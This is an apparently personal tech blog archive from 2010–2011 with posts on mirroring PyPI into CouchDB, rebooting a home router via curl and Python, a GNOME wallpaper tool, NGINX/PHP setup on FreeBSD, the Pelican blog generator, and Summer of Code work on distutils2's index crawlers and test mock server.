Here comes CouchDB. CouchDB is a document-oriented database that knows how to speak REST and JSON. It’s easy to use, and provides a replication mechanism out of the box.

So, what ?

Hmm, I’m sure you got it. I’ve written a piece of software to link information from PyPI to a CouchDB instance. Then you can replicate the whole PyPI index with only one HTTP request on the CouchDB server. You can also access the information from the index directly using a REST API, speaking JSON. Handy.

So PyPIonCouch uses the PyPI XML/RPC API to get data from PyPI, and generates records in the CouchDB instance.
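To make the idea concrete, here is a rough sketch of how one record could be built. It is not the actual PyPIonCouch code: the document layout and the function name are assumptions, and the fake client only stands in for an XML-RPC proxy so the example runs offline. The two methods it mimics, `package_releases` and `release_data`, are the ones exposed by the PyPI XML/RPC API.

```python
def build_document(client, name):
    """Build a CouchDB-style document for one project from XML-RPC calls."""
    releases = {}
    for version in client.package_releases(name):
        releases[version] = client.release_data(name, version)
    # using the project name as document id is an assumption of this sketch
    return {"_id": name, "releases": releases}


class FakeClient:
    """Offline stand-in for an XML-RPC server proxy, for illustration only."""

    def package_releases(self, name):
        return ["0.1"]

    def release_data(self, name, version):
        return {"name": name, "version": version, "summary": "An example"}


document = build_document(FakeClient(), "example-project")
print(document["_id"], sorted(document["releases"]))
```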

The final goal is to avoid relying on this “simple” API, and to rely on a REST interface instead. I have set up a couchdb server on my server, which is available at http://couchdb.notmyidea.org/_utils/database.html?pypi.

There is not a lot to see there for now, but I’ve done the first import from PyPI yesterday and all went fine: it’s possible to access the metadata of all PyPI projects via a REST interface. Next step is to write a client for this REST interface in distutils2.

Example

For now, you can use pypioncouch via the command line, or via the python API.

Using the command line

You can do something like this for a full import. It takes a long time, because it fetches all the projects from pypi and imports their metadata:

$ pypioncouch --fullimport http://your.couchdb.instance/

If you already have the data on your couchdb instance, you can just update it with the latest information from pypi. However, I recommend just replicating the principal node, hosted at http://couchdb.notmyidea.org/pypi/, to avoid the duplication of nodes:

$ pypioncouch --update http://your.couchdb.instance/

The principal node is updated once a day for now; I’ll see whether that’s enough, and adjust over time.
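Replicating the principal node boils down to one POST on CouchDB's `_replicate` endpoint. The sketch below only builds that request without sending it; the local server address and the local database name are assumptions, and a real server may also require credentials.

```python
import json
from urllib.request import Request


def build_replication_request(local_server, source_db, target_db):
    """Build (without sending) the POST request asking CouchDB to replicate."""
    body = json.dumps({"source": source_db, "target": target_db,
                       "create_target": True})
    return Request(
        url=local_server.rstrip("/") + "/_replicate",
        data=body.encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


request = build_replication_request(
    "http://localhost:5984",              # assumed local CouchDB instance
    "http://couchdb.notmyidea.org/pypi",  # the principal node
    "pypi",                               # assumed local database name
)
print(request.get_method(), request.full_url)
# Sending it would be: urllib.request.urlopen(request)
```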

Using the python API

You can also use the python API to interact with pypioncouch:

>>> from pypioncouch import XmlRpcImporter, import_all, update
>>> import_all()
>>> update()

What’s next ?

I want to make a couchapp, in order to navigate PyPI easily. Here are some of the features I want to offer:

List all the available projects
List all the projects, filtered by specifiers
List all the projects by author/maintainer
List all the projects by keywords
Page for each project.
Provide a PyPI “Simple” API equivalent. Even if I want to replace it, I think it will be really easy to set up mirrors that way, with the out-of-the-box couchdb replication

I also still need to polish the import mechanism, so I can directly store in couchdb:

The OPML files for each project
The upload_time in a couchdb-friendly format (list of int)
The tags as lists (currently it’s only a string separated by spaces)
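The last two conversions are small enough to sketch here. This assumes the upload time is available as a Python `datetime` and the tags as one space-separated string; the function names are made up for the example.

```python
from datetime import datetime


def upload_time_to_list(moment):
    """Turn a datetime into [year, month, day, hour, minute, second]."""
    return [moment.year, moment.month, moment.day,
            moment.hour, moment.minute, moment.second]


def split_keywords(keywords):
    """Turn a space-separated keyword string into a list (empty if missing)."""
    return keywords.split() if keywords else []


print(upload_time_to_list(datetime(2011, 1, 20, 13, 37, 0)))
print(split_keywords("packaging couchdb pypi"))
```

A list of integers is convenient as a key in CouchDB views, since such keys can be sorted and grouped level by level (per year, per month and so on).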

The work I’ve done so far is available on https://bitbucket.org/ametaireau/pypioncouch/. Keep in mind that it’s still a work in progress, and everything can break at any time. However, any feedback will be appreciated!

Help me to go to the distutils2 paris’ sprint

2011-01-15T00:00:00+01:00

Edit: Thanks to logilab and some amazing people, I can make it to paris for the sprint. Many thanks to them for the support!

There will be a distutils2 sprint from the 27th to the 30th of January, thanks to logilab, which will host the event.

You can find more information about the sprint on the wiki page of the event (http://wiki.python.org/moin/Distutils/SprintParis).

I really want to go there, but I’m unfortunately stuck in the UK for money reasons. The cheapest return trip I’ve found costs about £80, which I can’t afford. Following some advice on #distutils, I’ve set up a ChipIn account for that, so if some people want to help me get there, they can give me some money that way.

I’ll probably work on the installer (to support old distutils and setuptools distributions) and on the uninstaller (depending on the first task). If I can’t make it to Paris, I’ll hang around on IRC to give some help when needed.

If you want to contribute some money to help me go there, feel free to use this chipin page: http://ametaireau.chipin.com/distutils2-sprint-in-paris

Thanks for your support !

How to reboot your bebox using the CLI

2010-10-21T00:00:00+02:00

I have an internet connection which, for some obscure reason, tends to be very slow from time to time. After rebooting the box (yes, that’s a harsh solution), everything seems to work fine again.

EDIT : Using grep

After a bit of thought, this is also really easy to do directly with the command line tools curl, grep and tail (but much harder to read).

curl -X POST -u joel:joel http://bebox.config/cgi/b/info/restart/\?be\=0\&l0\=1\&l1\=0\&tid\=RESTART -d "0=17&2=`curl -u joel:joel http://bebox.config/cgi/b/info/restart/\?be\=0\&l0\=1\&l1\=0\&tid\=RESTART | grep -o "name='2' value='[0-9]\+" | grep -o "[0-9]\+" | tail -n 1`&1"

The Python version

Well, that’s not the optimal solution, that’s a bit “gruik”, but it works.

import urllib2
import re
import argparse

REBOOT_URL = '/b/info/restart/?be=0&l0=1&l1=0&tid=RESTART'
BOX_URL = 'http://bebox.config/cgi'

def open_url(url, username, password):
    # register the credentials for HTTP basic authentication
    passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
    passman.add_password(None, url, username, password)
    authhandler = urllib2.HTTPBasicAuthHandler(passman)

    opener = urllib2.build_opener(authhandler)

    # install the opener globally, so later urlopen() calls are authenticated too
    urllib2.install_opener(opener)

    return urllib2.urlopen(url).read()

def reboot(url, username, password):
    # fetch the restart page and extract the token it expects back
    data = open_url(url, username, password)
    token = re.findall(r"name='2' value='([0-9]+)'", data)[1]
    # post the form back to trigger the reboot
    urllib2.urlopen(urllib2.Request(url=url, data='0=17&2=%s&1' % token))

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="""Reboot your bebox !""")

    parser.add_argument('username', help='username')
    parser.add_argument('password', help='password')
    parser.add_argument('--boxurl', default=BOX_URL, help='Base box url.  Default is %s' % BOX_URL)

    args = parser.parse_args()
    # plain concatenation: urljoin would drop the "/cgi" part of the base url
    url = args.boxurl.rstrip('/') + REBOOT_URL
    reboot(url, args.username, args.password)
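The fragile part of both versions is the token extraction. Here is a small sketch of that step alone, which can be tried offline. The HTML fragment is made up (it is only shaped like what the regular expressions above expect), and taking the last match mirrors the `tail -n 1` of the curl version.

```python
import re

TOKEN_PATTERN = re.compile(r"name='2' value='([0-9]+)")


def extract_token(html):
    """Return the last numeric value of the field named '2', or None."""
    matches = TOKEN_PATTERN.findall(html)
    return matches[-1] if matches else None


# Made-up page fragment, for illustration only
sample = ("<input type='hidden' name='2' value='111'>"
          "<input type='hidden' name='2' value='424242'>")
print(extract_token(sample))
```

Returning None when nothing matches avoids the IndexError the script would otherwise raise if the page layout changes.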

Dynamically change your gnome desktop wallpaper

2010-10-11T00:00:00+02:00

In gnome, you can use an XML file to get a dynamic wallpaper. It’s not so easy, though: you can’t just say “use the pictures in this folder”.

You can have a look to the git repository if you want: http://github.com/ametaireau/gnome-background-generator

Some time ago, I wrote a little python script to make that easier, and you can now use it too. It’s named “gnome-background-generator”, and you can install it via pip, for instance.

$ pip install gnome-background-generator

Then, you just have to use it this way:

$ gnome-background-generator -p ~/Images/walls -s
/home/alexis/Images/walls/dynamic-wallpaper.xml generated

Here is an extract of the --help output:

$ gnome-background-generator --help
usage: gnome-background-generator [-h] [-p PATH] [-o OUTPUT]
                                  [-t TRANSITION_TIME] [-d DISPLAY_TIME] [-s]
                                  [-b]

A simple command line tool to generate an XML file to use for gnome
wallpapers, to have dynamic walls

optional arguments:
  -h, --help            show this help message and exit
  -p PATH, --path PATH  Path to look for the pictures. If no output is
                        specified, will be used too for outputing the dynamic-
                        wallpaper.xml file. Default value is the current
                        directory (.)
  -o OUTPUT, --output OUTPUT
                        Output filename. If no filename is specified, a
                        dynamic-wallpaper.xml file will be generated in the
                        path containing the pictures. You can also use "-" to
                        display the xml in the stdout.
  -t TRANSITION_TIME, --transition-time TRANSITION_TIME
                        Time (in seconds) transitions must last (default value
                        is 2 seconds)
  -d DISPLAY_TIME, --display-time DISPLAY_TIME
                        Time (in seconds) a picture must be displayed. Default
                        value is 900 (15mn)
  -s, --set-background  '''try to set the background using gnome-appearance-
                        properties
  -b, --debug
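To give an idea of what the generated file looks like, here is a minimal sketch that builds a slideshow XML for a list of pictures. It is not the code of gnome-background-generator: the function name, the picture paths and the arbitrary start time are assumptions, and the default durations simply reuse the values from the help text above.

```python
import xml.etree.ElementTree as ET


def build_wallpaper_xml(pictures, display_time=900, transition_time=2):
    """Return slideshow XML cycling through `pictures` (a list of paths)."""
    background = ET.Element("background")
    # the slideshow needs a reference start time; this one is arbitrary
    start = ET.SubElement(background, "starttime")
    for tag, value in [("year", 2010), ("month", 1), ("day", 1),
                       ("hour", 0), ("minute", 0), ("second", 0)]:
        ET.SubElement(start, tag).text = str(value)
    for index, picture in enumerate(pictures):
        # after the last picture, loop back to the first one
        following = pictures[(index + 1) % len(pictures)]
        static = ET.SubElement(background, "static")
        ET.SubElement(static, "duration").text = "{0:.1f}".format(display_time)
        ET.SubElement(static, "file").text = picture
        transition = ET.SubElement(background, "transition")
        ET.SubElement(transition, "duration").text = "{0:.1f}".format(transition_time)
        ET.SubElement(transition, "from").text = picture
        ET.SubElement(transition, "to").text = following
    return ET.tostring(background, encoding="unicode")


xml_text = build_wallpaper_xml(["/home/alexis/Images/walls/a.jpg",
                                "/home/alexis/Images/walls/b.jpg"])
print(xml_text)
```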

How to install NGINX + PHP 5.3 on FreeBSD.

2010-10-10T00:00:00+02:00


I’ve not managed so far to get rid of php completely, so here’s a simple reminder about how to install php with NGINX on FreeBSD. Nothing hard, but it’s worth having this piece of configuration somewhere!

# update the ports
$ portsnap fetch update

# install php5 port
$ make config-recursive -C /usr/ports/lang/php5-extensions
$ make package-recursive -C /usr/ports/lang/php5-extensions

# install nginx
$ make config-recursive -C /usr/ports/www/nginx-devel
$ make package-recursive -C /usr/ports/www/nginx-devel

Now that we have all the dependencies installed, we need to configure the server a bit.

That’s a simple thing in fact, but it could be good to have something that will work without effort over time.

Here’s a sample of my configuration:

server {
    server_name ndd;
    set $path /path/to/your/files;
    root   $path;

    location / {
        index  index.php;
    }

    location ~* ^.+\.(jpg|jpeg|gif|css|png|js|ico|xml)$ {
      access_log        off;
      expires           30d;
    }

    location ~ \.php$ {
        fastcgi_param  SCRIPT_FILENAME  $path$fastcgi_script_name;
        fastcgi_pass   backend;
        include fastcgi_params;
    }
}

upstream backend {
        server 127.0.0.1:9000;
}

And that’s it !

Pelican, a simple static blog generator in python

2010-10-06T00:00:00+02:00

Lately, I’ve written a little python application to fit my blogging needs. I’m an occasional blogger, a vim lover, I like restructured text and DVCSes, so I’ve made a little tool that makes good use of all that.

Pelican (for calepin) is just a simple tool to generate your blog as static files, letting you use your editor of choice (vim!). It’s easy to extend, and has template support (via jinja2).

I’ve made it to fit my needs. I hope it will fit yours, but maybe it won’t: it has not been designed to fit everyone’s needs.

Need an example? You’re looking at it! This weblog is generated with pelican, atom feeds included.

I’ve released it under AGPL, since I want all modifications to benefit all users.

You can find a repository to fork at https://github.com/getpelican/pelican/. Feel free to hack it!

If you just want to get started, use your installer of choice (pip, easy_install, …) and then have a look at the help (pelican --help):

$ pip install pelican

Usage

Here’s a sample usage of pelican

$ pelican .
writing /home/alexis/projets/notmyidea.org/output/index.html
writing /home/alexis/projets/notmyidea.org/output/tags.html
writing /home/alexis/projets/notmyidea.org/output/categories.html
writing /home/alexis/projets/notmyidea.org/output/archives.html
writing /home/alexis/projets/notmyidea.org/output/category/python.html
writing /home/alexis/projets/notmyidea.org/output/pelican-a-simple-static-blog-generator-in-python.html
Done !
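As the output shows, each article ends up in an HTML file named after its title. The sketch below illustrates how such a name can be derived; it is not Pelican's actual implementation, and the function names are made up for the example.

```python
import re


def slugify(title):
    """Lowercase a title and join its alphanumeric runs with hyphens."""
    return "-".join(re.findall(r"[a-z0-9]+", title.lower()))


def output_name(title):
    """File name under which an article with this title would be written."""
    return slugify(title) + ".html"


print(output_name("Pelican, a simple static blog generator in python"))
```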

You can also use the --help option of the command line to get more information:

$ pelican --help
usage: pelican [-h] [-t TEMPLATES] [-o OUTPUT] [-m MARKUP] [-s SETTINGS] [-b]
               path

A tool to generate a static blog, with restructured text input files.

positional arguments:
  path                  Path where to find the content files (default is
                        "content").

optional arguments:
  -h, --help            show this help message and exit
  -t TEMPLATES, --templates-path TEMPLATES
                        Path where to find the templates. If not specified,
                        will uses the ones included with pelican.
  -o OUTPUT, --output OUTPUT
                        Where to output the generated files. If not specified,
                        a directory will be created, named "output" in the
                        current path.
  -m MARKUP, --markup MARKUP
                        the markup language to use. Currently only
                        ReSTreucturedtext is available.
  -s SETTINGS, --settings SETTINGS
                        the settings of the application. Default to None.
  -b, --debug

Enjoy :)

An amazing summer of code working on distutils2

2010-08-16T00:00:00+02:00

The Google Summer of Code I spent working on distutils2 is over. It was a really amazing experience, for many reasons.

First of all, we had a very good team: five students were working on distutils2 (Zubin, Éric, Josip, Konrad and me). In addition, Mouad worked on the PyPI testing infrastructure. You can find what each person did on the distutils2 wiki page.

We were in contact with each other really often, helping one another when possible (in #distutils), and were continuously aware of the state of each participant’s work. This, in my opinion, put us in good shape.

Then, I’ve learned a lot. Python packaging was completely new to me when the GSoC started, and I was pretty unfamiliar with Python good practices too, as I only started learning Python in late 2009.

I recently looked at some Python code I wrote just three months ago, and I was amazed at how many improvements I could think of. I guess this is a good indicator of the path I’ve traveled since I wrote it.

This summer was awesome because I’ve learned about Python good practices, I now have some solid Mercurial knowledge, and I’ve seen a little of how the Python community works.

Then, I would like to say a big thanks to all the mentors who were around when needed, on IRC or via mail, and especially to my mentor for this summer, Tarek Ziadé.

Thanks a lot for your motivation, your leadership and your cheerfulness, even with a newborn and a new job!

Why ?

I wanted to work on Python packaging because, as time passed, the tools in this field had become rather complex. Everyone wanted to add features to distutils, but not in a standard way.

Now, we have PEPs that describe formats we agreed on (see PEP 345), and we wanted a tool on which users can base their code: that’s distutils2.

My job

I had to provide a simple way to crawl the PyPI indexes, and to write some installation / uninstallation scripts.

All the work done is available in my bitbucket repository.

Crawling the PyPI indexes

There are two ways of requesting information from the indexes: using the “simple” index, which is a kind of REST index, and using XML-RPC.

I’ve done both implementations, and a high-level API to query the two. Basically, this supports the mirroring infrastructure defined in PEP 381. So far, the work I’ve done is going to be used in pip (they’ve basically copy/pasted the code, but this will change as soon as we get something completely stable for distutils2), and that’s good news, as it was the main reason I did it.

I’ve tried to provide a unified API for the clients, to switch easily from one implementation to another. I’m already thinking of adding other crawlers, and it was made to be extensible.

If you want more information about the crawlers/PyPI clients, please refer to the distutils2 documentation, especially the pages about indexes.

You can find the changes I made about this in the distutils2 source code.

Installation / Uninstallation scripts

The next step was to think about an installation script, and an uninstaller. I’ve not done the uninstaller part yet; it’s a small part, as it’s basically removing some files from the system, so I’ll probably do it in the near future.

distutils2 provides a way to install distributions, and to handle dependencies between releases. For now, this support only covers the latest version of the METADATA (1.2, see PEP 345), but I’m working on a compatibility layer for the old metadata, and for the information provided via pip’s requires.txt, for instance.

Extra work

Also, I’ve done some extra work. This includes:

Working on PEP 345, and having some discussions about it (about the names of some fields).
Writing a PyPI server mock, useful for tests. You can find more information about it in the documentation.

Future plans

As I said, I’ve enjoyed working on distutils2, and the people I’ve met here are really pleasant to work with. So I want to continue contributing to Python, and especially to Python packaging, because there are still a lot of things to do in this area to get something really usable.

I’m not fully satisfied with the work I’ve done, so I’ll probably tweak it a bit: the installer part is not yet completely finished, and I want to add support for a real REST index in the future.

We’ll probably talk about this again in the coming months, but we definitely need a real REST API for PyPI, as the “simple” index is an ugly hack, in my opinion. I’ll work on a serious proposal about this, maybe involving CouchDB, as it seems to be a good option for what we want here.

Issues

I’ve encountered some issues during this summer. The main one is that it’s hard to work remotely, especially when working in the same room we live in, with others. I like to just think about a project with other people, a paper and a pencil, no computers. This was not really possible at the start of the project, as I needed to read a lot of code to understand the codebase, and then to read/write emails.

I finally managed to work in an office, so that’s a good point for home/office separation.

I had not expected there would be such a high number of emails to read in order to follow what’s going on in the Python world. Being part of the community takes time spent reading and writing emails, especially for those (like me) who aren’t so comfortable with English (but this has earned me some English-fu!).

Thanks !

A big thanks to Graine Libre and Makina Corpus, who offered to let me come into their offices from time to time, to share their cheerfulness! Many thanks too to the Google Summer of Code program for setting up such an initiative. If you’re a student and you’re interested in FOSS, don’t hesitate for a second: it’s a really good opportunity to work on interesting projects!

Sprinting on distutils2 in Tours

2010-07-10T00:00:00+02:00

date: 2010-07-06
category: tech

Yesterday, as I was traveling to Tours, I took some time to visit Éric, another student who’s working on distutils2 this summer as part of the GSoC. Basically, it was to have a drink, discuss distutils2 a bit, our respective tasks and general feelings, and to put a face to a pseudonym. I really enjoyed this time, because Éric knows a lot about Mercurial and Python good practices, and I’m eager to learn about those. So, we discussed a lot and did not write much code, but we have some things to propose about documentation, and I also share here some snippets of the conversations we had.

Documentation

While writing the PyPI simple index crawler documentation, I realized that we are missing some structure, or a how-to, for the documentation. Yep, you read that right. We lack documentation on how to write documentation. Heh. We’re missing some rules to follow, and this leads to a not-so-structured final documentation. We probably target three types of audience, and we can split the documentation accordingly:

Packagers who want to distribute their software.
End users who need to understand how to use end-user commands, like the installer/uninstaller.
Packaging coders who use distutils2 as a base for building a package manager.

We also need to discuss a pattern to follow while writing documentation. How many parts do we need? Where do we put the API description? Etc. This may not seem so important, but I guess readers would appreciate having the same structure throughout the distutils2 documentation.

Mercurial

I’m really not a Mercurial power user. I use it on a daily basis, but I lack some basic knowledge about it. Big thanks to Éric for sharing yours with me, you’ve been a great help. We talked about some Mercurial extensions that seem to make life simpler when used the right way. I’ve not used them so far, so consider this a personal note.

hg histedit, to edit the history
hg crecord, to select the changes to commit

We spent some time reviewing a merge I made on Sunday, re-merging it, and committing the changes as a new changeset. Awesome. These things tell me I need to read the hg book, and I will do so as soon as I get some spare time: Mercurial seems to be simply great. So… great. I’m a powerful merger now!

On using tools

Because we are also hackers, we shared a bit about the way we code, the tools we use, etc. Both of us use vim, and I discovered vimdiff and hgtk, which will completely change the way I navigate the Mercurial history. We aren’t “power users”, so we learned vim tips from each other. You can find my dotfiles on github, if that helps. They’re not perfect, and not intended to be, because they change all the time as I learn. Don’t hesitate to have a look, and to propose enhancements if you have any!

On being pythonic

My background as a long-time Java user has not served me well so far, as the paradigms are not the same when coding in Python. It’s hard to find the most pythonic way to do things, and sometimes hard to unlearn my way of thinking about software engineering. Well, it seems that the only solution is to read code, and to re-read import this from time to time! Coding like a pythonista seems to be a must-read, so I know what to do.

Conclusion

It was really great. Next time, we’ll need to focus a bit more on distutils2, and to have a bullet list of things to do, but days like this one are opportunities to seize! We’ll probably do another sprint in a few weeks, stay tuned!

Introducing the distutils2 index crawlers

2010-07-06T00:00:00+02:00

I’ve been working on distutils2 for about a month, even if I was a bit busy (as I had some courses and exams to work on).

I’ll try to sum up my general feelings here, and the work I’ve done so far. You can also find, if you’re interested, my weekly summaries in a dedicated wiki page.

General feelings

First, and it’s a really important point, the GSoC is going very well, for me as for the other students, at least from my perspective. It’s a pleasure to work with such enthusiastic people, as this makes the overall atmosphere very pleasant.

First of all, I’ve spent time reading the existing codebase, to understand what we’re going to do, and what the rationale for doing so is.

It’s really clear to me now: what we’re building is the foundation of a packaging infrastructure for Python. The fact is that many projects coexist, and each comes with its own good concepts. Distutils2 tries to take the interesting parts of each, and to provide them in the Python standard library, respecting the recently written PEP about packaging.

With distutils2, it will be simpler to make “things” compatible. So if you come up with a new way to deal with distributions and packaging in Python, you can use the Distutils2 APIs to do so.

Tasks

My main task while working on distutils2 is to provide an installation and an uninstallation command, as described in PEP 376. For this, I first need to get information about the existing distributions (their version, name, metadata, dependencies, etc.).

The main index, which you probably know and use, is PyPI. You can access it at http://pypi.python.org.

PyPI index crawling

There are two ways to get this information from PyPI: using the simple API, or via XML-RPC calls.

One goal was to use the version specifiers defined in PEP 345, and to provide a way to sort the retrieved distributions depending on our needs, to pick the version we want/need.

Using the simple API

The simple API is composed of HTML pages you can access at http://pypi.python.org/simple/.

Distribute and Setuptools already provide a crawler for that, but it deals with their internal mechanisms, and I found the code was not as clear as I wanted. That’s why I preferred to pick up the good ideas and some implementation details, while rethinking the overall architecture.

The rules are simple: each project has a dedicated page, which gives us information about:

the distribution download locations (for some versions)
homepage links
some other useful information, such as the bugtracker address, for instance.

If you want to find all the distributions of the “EggsAndSpam” project, you could do the following (do not pay too much attention to the names here, as the API will probably change a bit):

>>> index = SimpleIndex()
>>> index.find("EggsAndSpam")
[EggsAndSpam 1.1, EggsAndSpam 1.2, EggsAndSpam 1.3]

We could also use version specifiers:

>>> index.find("EggsAndSpam (<=1.2)")
[EggsAndSpam 1.1, EggsAndSpam 1.2]

Internally, what’s done here is the following:

it processes the http://pypi.python.org/simple/FooBar/ page, searching for download URLs.
for each distribution download URL found, it creates an object containing information about the project name, the version and the URL where the archive is located.
it sorts the found distributions, using version numbers. The default behavior here is to prefer source distributions (over binary ones), and to rely on the latest “final” distribution (rather than beta, alpha, etc. ones).

So, nothing difficult here.
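To make these steps more concrete, here is a minimal sketch in Python 3. It is not the distutils2 code: the page content, the LinkCollector class and the find_distributions function are assumptions made for the illustration, only .tar.gz source archives are recognised, and version parsing is deliberately simplified (a version counts as “final” when nothing follows its dotted numbers).

```python
import re
from html.parser import HTMLParser

# Hypothetical page content, standing in for a project page of the simple index
PAGE = """
<a href="/packages/EggsAndSpam-1.1.tar.gz">EggsAndSpam-1.1.tar.gz</a>
<a href="/packages/EggsAndSpam-1.3b1.tar.gz">EggsAndSpam-1.3b1.tar.gz</a>
<a href="/packages/EggsAndSpam-1.2.tar.gz">EggsAndSpam-1.2.tar.gz</a>
<a href="http://example.org/home">Home page</a>
"""

# Matches "Name-version.tar.gz" at the end of a URL (simplified on purpose)
ARCHIVE = re.compile(r"(?P<name>[A-Za-z]+)-(?P<version>[0-9][0-9a-z.]*)\.tar\.gz$")


class LinkCollector(HTMLParser):
    """Collect the href attribute of every <a> tag found in a page."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.links.append(href)


def parse_version(text):
    """Split a version such as '1.3b1' into ((1, 3), is_final)."""
    match = re.match(r"([0-9]+(?:\.[0-9]+)*)(.*)$", text)
    numbers = tuple(int(part) for part in match.group(1).split("."))
    return numbers, match.group(2) == ""


def find_distributions(page):
    # Step 1: search the page for download URLs
    collector = LinkCollector()
    collector.feed(page)
    # Step 2: build one record per archive (name, version, URL)
    found = []
    for url in collector.links:
        match = ARCHIVE.search(url)
        if match:
            found.append(
                {"name": match["name"], "version": match["version"], "url": url}
            )

    # Step 3: final releases first, then the highest version number first
    def sort_key(dist):
        numbers, is_final = parse_version(dist["version"])
        return (is_final, numbers)

    return sorted(found, key=sort_key, reverse=True)


versions = [dist["version"] for dist in find_distributions(PAGE)]
```

With this sample page, the 1.3b1 beta ends up last even though its number is the highest, which is the “prefer final releases” behavior described above.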

We provide a bunch of other features, like relying on the new PyPI mirroring infrastructure or filtering the found distributions by some criteria. If you’re curious, please browse the distutils2 documentation.

Using xml-rpc

We can also make some XML-RPC calls to retrieve information from PyPI. It’s a much more reliable way to get information from the index (as the index itself provides the information), but it costs processing time on the remote PyPI server.

For now, querying through the XML-RPC client is not available in Distutils2, as I’m still working on it. The main pieces are already present (I’ll reuse some work I’ve done for the SimpleIndex querying, and some code already set up); what I need to do is provide an XML-RPC PyPI mock server, and that’s what I’m currently working on.
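As an illustration of what such a mock could look like, here is a minimal sketch using only the Python 3 standard library (xmlrpc.server and xmlrpc.client). It is not the distutils2 mock: the canned RELEASES data and the start_mock_server helper are assumptions, and only one method, named after PyPI’s package_releases XML-RPC call, is served.

```python
import threading
from xmlrpc.client import ServerProxy
from xmlrpc.server import SimpleXMLRPCServer

# Hypothetical canned data returned by the mock
RELEASES = {"EggsAndSpam": ["1.1", "1.2", "1.3"]}


def package_releases(package_name):
    """Return the known versions of a project, or an empty list."""
    return RELEASES.get(package_name, [])


def start_mock_server():
    # Port 0 lets the operating system pick a free port
    server = SimpleXMLRPCServer(("127.0.0.1", 0), logRequests=False)
    server.register_function(package_releases)
    # Serve from a daemon thread so the calling code is not blocked
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    return server


server = start_mock_server()
host, port = server.server_address
client = ServerProxy(f"http://{host}:{port}/")
versions = client.package_releases("EggsAndSpam")
unknown = client.package_releases("DoesNotExist")
server.shutdown()
server.server_close()
```

Because the mock answers on a local port, tests can exercise the client code without putting any load on the real index.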

Processes

For now, I’m trying to follow the “documentation, then test, then code” path, and that seems to be really needed when working with a community. Code is hard to read/understand compared to documentation, and documentation is easier to change.

While writing the simple index crawler, I should have done this, to avoid some API changes and some wasted time.

Also, I’ve set up a schedule, and the goal is to be sure everything will be ready on time, by the end of the summer. (And now, I need to learn to follow schedules…)

Use Restructured Text (ReST) to power your presentations

2010-06-25T00:00:00+02:00

date: 2010-06-25
category: tech

On Wednesday, some friends and I gave a presentation about the CouchDB database to the local Toulouse LUG. Thanks a lot to everyone who attended, it was a pleasure to talk about this topic with you. Too bad the season is over now and I’m leaving Toulouse next year.

During our brainstorming about the topic, we used some paper, and we wanted to make the presentation in the simplest way. The first thing that came to my mind was using restructured text, so I wrote a simple file containing our different bullet points. In fact, there is almost nothing left to do after that to have a working presentation.

So far, I’ve used the rst2pdf program, and a simple template, to generate the output. It’s probably simple to get similar results using latex + beamer, and I’ll try this next time, but as I’m not familiar with the latex syntax, restructured text was a great option.

Here are the final PDF output, the ReST source, the theme used, and the command line to generate the PDF:

rst2pdf couchdb.rst -b1 -s ../slides.style

First week working on distutils2

2010-06-04T00:00:00+02:00

As I’ve been working on Distutils2 during the past week, taking part in the GSoC program, here is a short summary of what I’ve done so far.

As my courses are not over yet, I’ve not worked as much as I wanted, and this will continue until the end of June. My main tasks are about making installation and uninstallation commands, to have a simple way to install distributions via Distutils2.

To do this, we need to rely on information provided by the Python Package Index (PyPI), and there are at least two ways to retrieve information from it: XML-RPC and the “simple” API.

So, I’ve been working on porting some Distribute-related code to Distutils2, cutting out everything that is not distutils, as we do not want to depend on Distribute’s internals. My main work has been about reading the whole code, writing tests for it and making those tests possible.

In fact, there was a need for a mocked PyPI server and, after reading and getting familiar with the distutils behaviors and code, I’ve taken some time to improve the work Konrad did on this mock.

A PyPI Server mock

The mock is embedded in a thread, to make it available during the tests in a non-blocking way. We first used WSGI and wsgiref in order to control what to serve, and to log the requests made to the server, but finally realised that wsgiref is not Python 2.4 compatible (and we need to be Python 2.4 compatible in Distutils2).

So, we switched to BaseHTTPServer and SimpleHTTPServer, and updated our tests accordingly. It’s been an opportunity to realize that WSGI has been a great step forward for making HTTP servers, and exposes a much simpler way to talk HTTP!
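The idea of a threaded mock that logs the requests it receives can be sketched as follows. This is not the actual distutils2 mock: it is written for Python 3, where BaseHTTPServer lives in the http.server module, and the PAGES content, MockHandler and MockServer names are assumptions made for the example.

```python
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Hypothetical canned pages, keyed by request path
PAGES = {
    "/simple/EggsAndSpam/": b'<a href="EggsAndSpam-1.1.tar.gz">EggsAndSpam-1.1.tar.gz</a>',
}


class MockHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Record the request so that tests can check what was asked
        self.server.requests.append(self.path)
        body = PAGES.get(self.path)
        if body is None:
            self.send_error(404)
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        pass  # keep the test output quiet


class MockServer:
    """Run the HTTP server in a background thread for the duration of a test."""

    def __init__(self):
        # Port 0 lets the operating system pick a free port
        self.httpd = HTTPServer(("127.0.0.1", 0), MockHandler)
        self.httpd.requests = []
        self.thread = threading.Thread(target=self.httpd.serve_forever, daemon=True)

    def __enter__(self):
        self.thread.start()
        host, port = self.httpd.server_address
        self.url = f"http://{host}:{port}"
        return self

    def __exit__(self, *exc_info):
        self.httpd.shutdown()
        self.httpd.server_close()


# Bypass any proxy configured in the environment: the mock is local
opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))

with MockServer() as mock:
    with opener.open(mock.url + "/simple/EggsAndSpam/") as response:
        page = response.read()
    logged = list(mock.httpd.requests)
```

Running the server in its own thread is what makes it non-blocking: the test code keeps control, sends its requests, then inspects the recorded paths.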

You can find the modifications I made, and the related docs, on my bitbucket distutils2 clone.

The PyPI Simple API

So, back to the main problem: making a Python library to access and request information stored on PyPI, via the simple API. As I said, I’ve just grabbed the work done in Distribute and played with it a bit, in order to see what the different use cases are, and started to write the related tests.

The work to come

So, once all use cases are covered with tests, I’ll rewrite the grabbed code a bit, and do some software design work (to not expose everything as private methods, to have a clear API, and other things like this), then update the tests accordingly and write documentation to make this clear.

The next step is to write a little client, which I’ve already started here. I’ll keep you updated!

A Distutils2 GSoC

2010-05-01T00:00:00+02:00

